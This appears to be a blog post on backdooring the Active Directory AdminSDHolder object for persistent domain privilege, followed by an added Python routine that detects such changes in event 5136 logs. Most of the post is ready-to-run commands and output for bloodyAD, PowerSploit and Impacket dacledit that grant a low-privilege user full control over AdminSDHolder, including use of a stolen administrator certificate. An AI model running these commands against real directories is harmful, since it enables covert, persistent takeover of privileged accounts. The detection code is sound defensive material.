Backdooring AdminSDHolder

Posted: 06-20-2025

AdminSDHolder is a container object in Active Directory that acts as a template for the security descriptors applied to high-privilege (protected) accounts and groups. Every 60 minutes, the SDProp process rewrites the security descriptors of these accounts to match the permissions defined on AdminSDHolder, which enforces consistent access controls on them.

Because SDProp propagates whatever is set on AdminSDHolder, the object can be abused to persist privileges or plant a backdoor: granting a low-privilege user control of AdminSDHolder gives that user control of every protected account once SDProp runs.

Vulnerable certificate templates are one way to reach the required privilege. After obtaining a certificate for a privileged user, bloodyAD can be used to assign GenericAll on AdminSDHolder to a low-privilege user.

pipx install bloodyAD

Grant testuser1 GenericAll on AdminSDHolder:

bloodyAD -c ":administrator.pem" -d domain.com -u administrator --host 192.168.70.2 add genericAll 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' testuser1
To reverse the change, use remove genericAll in place of add genericAll.

Output:
[+] testuser1 has now GenericAll on CN=AdminSDHolder,CN=System,DC=domain,DC=com

testuser1 now has full control over the AdminSDHolder object.

Without monitoring of changes to the AdminSDHolder security descriptor, this modification may go unnoticed, leading to undetected privilege escalation. Any account protected by AdminSDHolder (e.g., members of Domain Admins) can then be modified or persistently controlled from this foothold.
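Detection logic for the change described above, as an added example rather than code from the original post: it inspects a Windows Security event 5136 (directory service object modified), which records a DACL write as AttributeLDAPDisplayName = nTSecurityDescriptor with the new descriptor in SDDL form, assuming directory service change auditing is enabled for the object. The sample event, the SID values and the EXPECTED_TRUSTEES baseline are constructed assumptions.

```python
# Flag event 5136 records that grant control of AdminSDHolder to an unexpected trustee.
# Added example; SAMPLE_EVENT and EXPECTED_TRUSTEES are constructed assumptions.
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
ADMINSDHOLDER_DN = re.compile(r"^CN=AdminSDHolder,CN=System,DC=", re.IGNORECASE)
OP_VALUE_ADDED = "%%14674"            # OperationType code rendered as "Value Added"
DANGEROUS_ABBR = {"GA", "WD", "WO"}   # GENERIC_ALL, WRITE_DAC, WRITE_OWNER
DANGEROUS_MASK = 0x10000000 | 0x00040000 | 0x00080000
EXPECTED_TRUSTEES = {"BA", "DA", "EA", "SY"}   # baseline SDDL aliases (assumption)
# SDDL ACE: (type;flags;rights;object_guid;inherit_guid;sid); only allow-ACEs matter here
ACE_RE = re.compile(r"\((A);[^;]*;([^;]*);[^;]*;[^;]*;([^)]+)\)")

def rights_are_dangerous(rights: str) -> bool:
    """True if an SDDL rights field (hex mask or two-letter tokens) grants control."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & DANGEROUS_MASK)
    return bool({rights[i:i + 2] for i in range(0, len(rights), 2)} & DANGEROUS_ABBR)

def parse_5136(xml_text: str) -> dict:
    """Flatten the <EventData> fields of an exported 5136 event into a dict."""
    root = ET.fromstring(xml_text)
    ev = {d.get("Name"): (d.text or "") for d in root.iterfind(".//e:EventData/e:Data", NS)}
    ev["EventID"] = root.findtext(".//e:System/e:EventID", namespaces=NS)
    return ev

def suspicious_adminsdholder_aces(xml_text: str) -> list[dict]:
    """Return allow-ACEs in the new descriptor that hand control to non-baseline trustees."""
    ev = parse_5136(xml_text)
    if (ev.get("EventID") != "5136"
            or not ADMINSDHOLDER_DN.match(ev.get("ObjectDN", ""))
            or ev.get("AttributeLDAPDisplayName", "").lower() != "ntsecuritydescriptor"
            or ev.get("OperationType") != OP_VALUE_ADDED):
        return []
    actor = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
    return [{"actor": actor, "trustee": sid, "rights": rights}
            for _, rights, sid in ACE_RE.findall(ev.get("AttributeValue", ""))
            if rights_are_dangerous(rights) and sid not in EXPECTED_TRUSTEES]

# Constructed sample: descriptor after a GenericAll grant to an ordinary user SID.
SAMPLE_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>5136</EventID></System><EventData>
<Data Name="SubjectUserName">administrator</Data><Data Name="SubjectDomainName">DOMAIN</Data>
<Data Name="ObjectDN">CN=AdminSDHolder,CN=System,DC=domain,DC=com</Data>
<Data Name="AttributeLDAPDisplayName">nTSecurityDescriptor</Data>
<Data Name="AttributeValue">O:DAG:DAD:PAI(A;;GA;;;S-1-5-21-1111-2222-3333-1105)(A;;RPLCLORC;;;AU)(A;;GA;;;DA)</Data>
<Data Name="OperationType">%%14674</Data></EventData></Event>"""
```

Running suspicious_adminsdholder_aces(SAMPLE_EVENT) yields one hit for the user SID with GA rights while the Domain Admins and Authenticated Users entries are ignored; a 5136 DACL change normally arrives as a deleted/added pair, so only the added value is evaluated.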

PowerSploit can also abuse AdminSDHolder:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName testuser1 -Verbose -Rights All

As well as Impacket's dacledit:

python3 -m pipx install impacket

dacledit.py -action 'write' -rights 'FullControl' -principal 'testuser1' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=COM' domain.com/admin -dc-ip 192.168.70.2

Verify:

dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=COM' domain.com/admin
